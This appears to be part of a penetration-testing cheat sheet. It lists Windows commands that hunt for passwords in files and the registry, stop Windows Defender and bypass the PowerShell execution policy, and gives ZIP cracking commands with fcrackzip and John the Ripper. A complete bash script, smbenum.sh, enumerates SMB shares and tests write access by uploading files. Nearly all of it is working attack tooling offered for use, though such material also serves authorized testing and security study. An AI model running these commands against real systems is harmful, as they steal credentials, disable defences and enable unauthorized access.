findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Disable windows defender
sc stop WinDefend
# Bypass the PowerShell execution policy restriction
powershell -nop -ep bypass
# List hidden files
dir /a
# Find a file
dir /b/s "<FILE>"
|
ZIP
| fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip
zip2john file.zip > zip.john
john --wordlist=<PASSWORDS_LIST> zip.john
|
SMBEnum Script
smbenum.sh
| #!/bin/bash
# Input params
host="$1"
user="$2"
pass="$3"
# Colors
RED='\033[1;31m'
YELLOW='\033[1;33m'
GRAY='\033[0;37m'
RST='\033[0m'
# Check host
if [ -z "$host" ]
then
    echo "Usage: $0 host [user] [pass]"
    echo "Default user and password is 'anon'"
    exit 1
fi
# Check user name and password
if [ -z "$user" ] ; then user="anon" ; fi
if [ -z "$pass" ] ; then pass="anon" ; fi
# smbclient
smbclient=$(which smbclient)
# Checks read or write permission: uploading (then deleting) a temp file
# in the directory succeeds only where we can write
function checkReadWritePerm() {
    local share="$1"
    local tdir="$2"
    local tmpFile="$3"
    if $smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "cd ${tdir}; put ${tmpFile}; rm ${tmpFile}" >/dev/null 2>&1
    then
        echo -en "${RED}WRITE\t"
        echo -n ": ${share} : ${tdir}"
        echo -e "${RST}"
    else
        echo -en "${YELLOW}READ\t"
        echo -n ": ${share} : ${tdir}"
        echo -e "${RST}"
    fi
}
# List the disk shares
shareList=$($smbclient -g -t 2 -L "$host" -U "${user}%${pass}" 2>/dev/null | awk -F'|' '$1 == "Disk" {print $2}')
# Write file
tmpFile=tmp_$$.tmp
cd "${TMPDIR:-/tmp}"
touch "${tmpFile}"
for share in $shareList
do
    if $smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "lcd" >/dev/null 2>&1
    then
        # Current dir
        checkReadWritePerm "${share}" "." "${tmpFile}"
        # Recursive dir
        $smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "recurse;dir" | egrep ^'\\' 2>/dev/null | while IFS= read -r line
        do
            checkReadWritePerm "${share}" "${line}" "${tmpFile}"
        done
    else
        echo -en "${GRAY}NONE\t"
        echo -n ": ${share}"
        echo -e "${RST}"
    fi
done
rm -f "${tmpFile}"
exit
|